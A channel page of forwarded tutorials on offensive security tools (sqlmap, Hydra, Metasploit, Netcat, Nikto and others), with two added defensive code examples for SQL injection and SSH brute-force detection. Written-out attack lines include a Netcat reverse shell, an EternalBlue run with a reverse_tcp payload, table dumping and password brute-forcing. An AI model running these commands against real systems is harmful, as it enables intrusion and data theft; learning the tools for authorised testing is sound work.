UNDERCODE TESTING
🦑 World's first platform that collects and analyzes every new hacking method.

+ Free AI Practice.

(New Bug Bounty Methods, Tools Updates, AI & Courses).

Services: Undercode.help/services

youtube.com/undercode

@Undercode_Testing
Forwarded from Exploiting Crew (Pr1vAt3)
🦑 Mobile Security Framework (MobSF) Hacking Tutorial

MobSF (Mobile Security Framework) is an open-source automated pen-testing framework used for analyzing Android, iOS, and Windows apps. It supports both static and dynamic analysis, making it an essential tool for app security assessments.

---

## Prerequisites
1. Install MobSF:
- Clone the MobSF repository:
```bash
git clone https://github.com/MobSF/Mobile-Security-Framework-MobSF.git
cd Mobile-Security-Framework-MobSF
```

- Install dependencies and start the server:
```bash
./setup.sh  # For Linux/Mac
python3 -m pip install -r requirements.txt
python3 manage.py runserver
```


Access MobSF via http://127.0.0.1:8000.

2. Java Environment:
Ensure Java is installed for decompiling Android APKs:
```bash
sudo apt install openjdk-11-jdk
```


3. Dynamic Analysis (Optional):
For dynamic analysis, you'll need:
- A VirtualBox VM or a rooted Android device.
- Genymotion (Android emulator).

---

## Step 1: Static Analysis
Static analysis examines the app's source code for vulnerabilities.

### Analyze an APK
1. Upload the APK file:
Drag and drop the APK onto the MobSF web interface.

2. Wait for processing:
MobSF will decompile the APK and display a detailed report.

### Review the Report
The report is divided into sections:
1. App Information:
Includes package name, version, permissions, and components.

2. Permissions Analysis:
Flags excessive or dangerous permissions like READ_SMS, WRITE_EXTERNAL_STORAGE, etc.

3. Manifest Analysis:
Examines the AndroidManifest.xml file for:
- Exported activities, services, and receivers.
- Insecure configurations.

4. Code Analysis:
Identifies potential vulnerabilities in the app's source code:
- Hardcoded API keys
- Weak encryption
- Unprotected credentials

5. Cryptographic Analysis:
Highlights insecure cryptographic practices, e.g., MD5 or hardcoded keys.

---

## Step 2: Dynamic Analysis
Dynamic analysis evaluates the app's behavior during runtime.

### Set Up Dynamic Analysis
1. Configure Emulator/Device:
- Install the MobSF dynamic analysis APK on the device.
- Set up ADB forwarding:
```bash
adb forward tcp:5000 tcp:5000
```


2. Launch Dynamic Analysis:
Start the dynamic analysis module in MobSF and connect your device.

3. Monitor Runtime Behavior:
- Inspect API calls, file system access, and network traffic.
- Use MobSF's built-in proxy for traffic analysis.

---

## Step 3: Advanced Features
1. Binary Analysis:
MobSF can analyze binaries (.so files) for vulnerabilities.

2. Memory Dump Analysis:
Inspect memory dumps for sensitive information like passwords or keys.

3. Malware Analysis:
Identify malicious patterns in APKs:
- Suspicious API usage
- Embedded malware signatures

---

## Step 4: Automation with REST API
MobSF provides an API for automation. Here's how to analyze an APK using the API:

1. Start MobSF API Server:
Enable the API server in settings.py.

2. Submit an APK:
```bash
curl -F "file=@app.apk" http://127.0.0.1:8000/api/v1/upload -H "Authorization: <your_api_key>"
```


3. Retrieve Results:
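```bash
# report_json expects a POST carrying the hash returned by the upload call
curl -X POST --data "hash=<hash_from_upload_response>" http://127.0.0.1:8000/api/v1/report_json -H "Authorization: <your_api_key>"
```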


---

## Step 5: Report Findings
Export the analysis report in various formats (PDF, HTML, JSON) for documentation.

---

### Common Use Cases
1. Testing Exported Components:
- Identify insecure exported activities, services, or receivers.

2. Analyzing Network Security:
- Check for plaintext HTTP traffic.
- Identify hardcoded server IPs or API keys.

3. Hardcoded Credentials:
- MobSF flags sensitive information like passwords embedded in the code.

---

### Important Notes
1. This tutorial is for ethical purposes. Ensure you have permission to test the app.
2. Use MobSF as part of a comprehensive app security assessment strategy.

---

Let me know if you'd like to explore specific features of MobSF!
Forwarded from Exploiting Crew (Pr1vAt3)
🦑 Tool: SQLmap

SQLmap is an automated penetration testing tool for detecting and exploiting SQL injection vulnerabilities in databases.

---

### Basic Usage Command:
```bash
sqlmap -u "http://example.com/index.php?id=1"
```


### Explanation:
- sqlmap: Invokes the SQLmap tool.
- -u: Specifies the target URL.
- "http://example.com/index.php?id=1": Target URL with a parameter (id=1) to test for SQL injection.

---

### Advanced Example: Dumping a Database
```bash
sqlmap -u "http://example.com/index.php?id=1" --dbs
```


Explanation:
- --dbs: Enumerates all databases on the vulnerable server.

---

### Example: Dump Tables from a Specific Database
```bash
sqlmap -u "http://example.com/index.php?id=1" -D mydatabase --tables
```


Explanation:
- -D mydatabase: Specifies the database (mydatabase).
- --tables: Lists all tables in the specified database.

---

### Use Case: Extracting Data from a Table
```bash
sqlmap -u "http://example.com/index.php?id=1" -D mydatabase -T users --dump
```


Explanation:
- -T users: Specifies the table (users).
- --dump: Dumps all data from the specified table.

---

### Important Notes:
1. Always obtain proper authorization before testing a website or application.
2. Misuse of SQLmap for unauthorized activities is illegal and unethical. Use it responsibly for educational or security testing purposes only.
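
Added example, not from the original post: what sqlmap probes for in a parameter such as id=1 is a query built by string concatenation. The Python code below puts such a query beside a validated, parameterized one; the table contents and function names are constructed for illustration.

```python
import re
import sqlite3

def make_db():
    """In-memory stand-in for the `users` table named in the post (constructed rows)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, secret TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "alice", "s1"), (2, "bob", "s2"), (3, "carol", "s3")])
    return db

def lookup_vulnerable(db, raw_id):
    # The request parameter is pasted into the SQL text, so the database
    # parses whatever the client sent as part of the statement.
    return db.execute("SELECT name FROM users WHERE id = " + raw_id).fetchall()

def lookup_hardened(db, raw_id):
    # 1) Reject anything that is not a plain decimal id.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return []
    # 2) Bind the value as a parameter; it is sent as data, never as SQL syntax.
    return db.execute("SELECT name FROM users WHERE id = ?", (int(raw_id),)).fetchall()

if __name__ == "__main__":
    db = make_db()
    for value in ("1", "1 OR 1=1"):
        print(repr(value), "vulnerable:", lookup_vulnerable(db, value),
              "hardened:", lookup_hardened(db, value))
```

With the hardened lookup the second input returns no rows, so a scanner has no behavioural difference to measure on that parameter.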
Forwarded from Exploiting Crew (Pr1vAt3)
🦑 Tool: Nmap (Network Mapper)

Nmap is a powerful tool for network discovery and security auditing.

---

### Basic Usage Command:
```bash
nmap 192.168.1.1
```


Explanation:
- nmap: Invokes the Nmap tool.
- 192.168.1.1: Target IP address for scanning.

---

### Advanced Example: Scanning All Open Ports
```bash
nmap -p- 192.168.1.1
```


Explanation:
- -p-: Scans all 65,535 TCP ports instead of the default 1,000.

---

### Example: Service and Version Detection
```bash
nmap -sV 192.168.1.1
```


Explanation:
- -sV: Enables service version detection to identify software running on open ports.

---

### Example: OS Detection
```bash
nmap -O 192.168.1.1
```


Explanation:
- -O: Attempts to determine the operating system of the target.

---

### Use Case: Full Network Scan
```bash
nmap -A 192.168.1.0/24
```


Explanation:
- -A: Enables OS detection, version detection, script scanning, and traceroute.
- 192.168.1.0/24: Scans all devices in the subnet.

---

### Important Notes:
1. Use Nmap only on networks or systems where you have explicit permission to scan.
2. Unauthorized scanning can be illegal. Always ensure compliance with ethical guidelines.
Forwarded from Exploiting Crew (Pr1vAt3)
🦑 Network Analyser Tool: Wireshark

Wireshark is a powerful network protocol analyzer used for capturing and examining network traffic in real time.

---

### Basic Usage Command:
```bash
wireshark
```


Explanation:
- Launches the Wireshark GUI for network packet analysis.

---

### Example: Capturing Traffic on a Specific Interface
```bash
tshark -i eth0
```


Explanation:
- tshark: Command-line version of Wireshark.
- -i eth0: Specifies the network interface (eth0) to capture traffic.

---

### Example: Save Captured Traffic to a File
```bash
tshark -i eth0 -w capture.pcap
```


Explanation:
- -w capture.pcap: Saves the captured packets to a file named capture.pcap for later analysis in Wireshark.

---

### Example: Filter for HTTP Traffic
```bash
tshark -i eth0 -f "tcp port 80"
```


Explanation:
- -f "tcp port 80": Filters the capture to only include HTTP traffic.

---

### Example: Analyze a Saved Packet Capture
```bash
wireshark capture.pcap
```


Explanation:
- Opens the file capture.pcap in Wireshark for in-depth analysis.

---

### Important Notes:
1. Always get permission before capturing network traffic.
2. Use Wireshark responsibly and ensure ethical usage for troubleshooting or learning purposes only.
Forwarded from Exploiting Crew (Pr1vAt3)
🦑 Tool: Hydra

Hydra is a fast and flexible login brute-forcing tool that supports numerous protocols.

---

### Basic Usage Command:
```bash
hydra -l admin -p password123 192.168.1.1 ssh
```


Explanation:
- hydra: Runs the Hydra tool.
- -l admin: Specifies the username (admin).
- -p password123: Specifies the password (password123).
- 192.168.1.1: Target IP address.
- ssh: Protocol to brute-force (in this case, SSH).

---

### Example: Using a Password List
```bash
hydra -l admin -P /path/to/passwords.txt 192.168.1.1 ssh
```


Explanation:
- -P /path/to/passwords.txt: Points to a file containing a list of potential passwords.

---

### Example: Brute-Forcing with Multiple Usernames
```bash
hydra -L /path/to/usernames.txt -P /path/to/passwords.txt 192.168.1.1 ssh
```


Explanation:
- -L /path/to/usernames.txt: Specifies a file with multiple usernames.
- -P /path/to/passwords.txt: Specifies a file with potential passwords.

---

### Example: Verbose Output
```bash
hydra -V -l admin -p password123 192.168.1.1 ssh
```


Explanation:
- -V: Displays each login attempt in real-time.

---

### Important Notes:
1. Only use Hydra on systems you are authorized to test.
2. Unauthorized brute-forcing is illegal and unethical. Always ensure compliance with laws and ethical guidelines.
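
Added example, not part of the original post: the login pattern produced by the password-list runs above is easy to spot in sshd logs. This Python detector flags source IPs with a burst of failed logins and notes whether a success followed; the log lines, threshold, window and function name are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE = re.compile(r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
                  r"(Failed|Accepted) password for (?:invalid user )?(\S+) from (\S+) port")

# Constructed sshd log (syslog format); IPs are documentation-range addresses.
SAMPLE_LOG = "\n".join(
    [f"Jan 10 03:12:{s:02d} host sshd[2211]: Failed password for admin "
     f"from 203.0.113.7 port {40000 + s} ssh2" for s in range(1, 7)]
    + ["Jan 10 03:12:09 host sshd[2211]: Accepted password for admin from 203.0.113.7 port 40009 ssh2",
       "Jan 10 08:00:10 host sshd[3001]: Failed password for alice from 198.51.100.4 port 51000 ssh2",
       "Jan 10 08:05:42 host sshd[3001]: Failed password for invalid user bob from 198.51.100.4 port 51001 ssh2",
       "Jan 10 08:06:00 host sshd[3001]: Accepted password for alice from 198.51.100.4 port 51002 ssh2"])

def detect_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Flag source IPs with >= threshold failed logins inside one sliding window."""
    failures = defaultdict(list)   # ip -> [(time, user)]
    accepted = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        # syslog timestamps carry no year; a fixed one is assumed for parsing.
        ts = datetime.strptime("2024 " + m.group(1), "%Y %b %d %H:%M:%S")
        bucket = failures if m.group(2) == "Failed" else accepted
        bucket[m.group(4)].append((ts, m.group(3)))
    alerts = {}
    for ip, events in failures.items():
        times = sorted(t for t, _ in events)
        burst = any(times[i + threshold - 1] - times[i] <= window
                    for i in range(len(times) - threshold + 1))
        if burst:
            alerts[ip] = {
                "failures": len(times),
                "users": sorted({u for _, u in events}),
                # A success after the last failure suggests a guessed password.
                "success_after": any(t > times[-1] for t, _ in accepted[ip]),
            }
    return alerts

if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_LOG).items():
        print(ip, info)
```

An alert with success_after set is the case to escalate first: rotate that account's password and review the session that followed.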
Forwarded from Exploiting Crew (Pr1vAt3)
🦑 Tool: Metasploit Framework

Metasploit is a powerful penetration testing framework that helps exploit vulnerabilities in systems.

---

### Basic Usage Command:
```bash
msfconsole
```


Explanation:
- Launches the Metasploit Framework console.

---

### Example: Scanning for Vulnerabilities
```
use auxiliary/scanner/http/http_version
set RHOSTS 192.168.1.1
run
```


Explanation:
1. use auxiliary/scanner/http/http_version: Loads an auxiliary module to check the HTTP server version.
2. set RHOSTS 192.168.1.1: Sets the target host.
3. run: Executes the module.

---

### Example: Exploiting a Vulnerability
```
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.1.1
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.100
run
```


Explanation:
1. use exploit/windows/smb/ms17_010_eternalblue: Loads the EternalBlue exploit module.
2. set RHOST 192.168.1.1: Sets the target's IP address.
3. set PAYLOAD windows/x64/meterpreter/reverse_tcp: Specifies the payload for remote shell access.
4. set LHOST 192.168.1.100: Sets the attacker's IP for the reverse connection.
5. run: Executes the exploit.

---

### Example: Checking Exploit Options
```
show options
```


Explanation:
- Lists all configurable options for the currently loaded module.

---

### Important Notes:
1. Always obtain explicit authorization before testing or exploiting a system.
2. Misuse of Metasploit for unauthorized purposes is illegal. Follow ethical and legal guidelines strictly.
Forwarded from Exploiting Crew (Pr1vAt3)
🦑 Tool: Burp Suite - Web Application Exploiting

Burp Suite is a comprehensive tool used for web vulnerability scanning and exploitation in web applications.

---

### Basic Usage Command:
```bash
burpsuite
```


Explanation:
- Launches the Burp Suite graphical interface for interaction.

---

### Example: Setting Proxy to Intercept Traffic
1. Open Burp Suite and go to the Proxy tab.
2. Set your browser’s proxy to 127.0.0.1:8080.
3. Enable Intercept to capture HTTP/S requests from the browser.

---

### Example: Scanning a Web Application for Vulnerabilities
1. Go to the Target tab in Burp Suite.
2. Add the URL of the target web application.
3. Right-click on the target URL and select "Scan" to detect common vulnerabilities such as SQL injection, XSS, etc.

---

### Example: Brute Force Attack with Intruder
1. Capture a login request using Proxy.
2. Switch to the Intruder tab and load the captured request.
3. Define the positions for the username and password fields.
4. Set the payloads to attempt different username and password combinations.
5. Click Start Attack to perform the brute-force attack.

---

### Example: Spidering a Website
```bash
burpsuite -spider https://example.com
```


Explanation:
- -spider https://example.com: Automatically crawls and maps the website to identify all accessible URLs.

---

### Important Notes:
1. Burp Suite is intended for ethical hacking, penetration testing, and vulnerability assessments.
2. Always obtain explicit permission before testing or exploiting web applications.
3. Unauthorized exploitation is illegal and against ethical guidelines.
Forwarded from Exploiting Crew (Pr1vAt3)
🦑 Tool: Netcat - Network Hacking and Administration

Netcat is a versatile networking tool used for reading from and writing to network connections using TCP or UDP, often referred to as the "Swiss Army knife" of networking.

---

### Basic Usage Command:
```bash
nc -lvp 4444
```


Explanation:
- nc: Invokes Netcat.
- -l: Tells Netcat to listen for incoming connections.
- -v: Enables verbose mode for more detailed output.
- -p 4444: Specifies the port (4444) to listen on.

---

### Example: Creating a Reverse Shell (Attacker's Side)
```bash
nc -lvp 4444
```

- Listens on port 4444 for incoming connections from the target machine.

### Example: Reverse Shell (Victim's Side)
```bash
nc -e /bin/bash 192.168.1.1 4444
```


Explanation:
- -e /bin/bash: Executes the Bash shell upon connection.
- 192.168.1.1: Attacker's IP address.
- 4444: Port to connect to on the attacker's machine.

---

### Example: Banner Grabbing
```bash
nc -v 192.168.1.1 80
```


Explanation:
- -v: Enables verbose mode.
- 192.168.1.1: Target IP.
- 80: Common HTTP port. Netcat can be used to grab the banner or response from web servers.

---

### Example: File Transfer
Send a File (Attacker's Side):
```bash
nc -lvp 4444 > received_file.txt
```


Receive a File (Victim's Side):
```bash
nc 192.168.1.1 4444 < file_to_send.txt
```


---

### Important Notes:
1. Netcat can be a powerful tool for legitimate network testing and troubleshooting.
2. Unauthorized use, such as exploiting vulnerabilities or creating backdoors, is illegal. Always ensure you have permission before using Netcat for penetration testing.
Forwarded from Exploiting Crew (Pr1vAt3)
🦑 Tool: Nikto - Web Server Scanning

Nikto is a web server scanner that detects security vulnerabilities in web servers, including outdated software, security misconfigurations, and other potential threats.

---

### Basic Usage Command:
```bash
nikto -h http://example.com
```


Explanation:
- nikto: Runs the Nikto tool.
- -h http://example.com: Specifies the target host to scan (http://example.com in this case).

---

### Example: Scanning for Specific Vulnerabilities
```bash
nikto -h http://example.com -Tuning 3
```


Explanation:
- -Tuning 3: Scans for known vulnerabilities (such as file permissions, potential information leaks, etc.).

---

### Example: Output Results to a File
```bash
nikto -h http://example.com -o scan_results.txt
```


Explanation:
- -o scan_results.txt: Saves the scan results to a text file named scan_results.txt.

---

### Example: Scan with Authentication
```bash
nikto -h http://example.com -id "admin:password123"
```


Explanation:
- -id "admin:password123": Uses basic HTTP authentication with the provided username and password.

---

### Example: Scan a Specific Port
```bash
nikto -h http://example.com -p 8080
```


Explanation:
- -p 8080: Specifies a custom port (8080) to scan for vulnerabilities.

---

### Important Notes:
1. Nikto is a powerful tool for security researchers and penetration testers.
2. Unauthorized scanning and exploitation of web servers is illegal. Always obtain proper authorization before using Nikto for vulnerability assessments.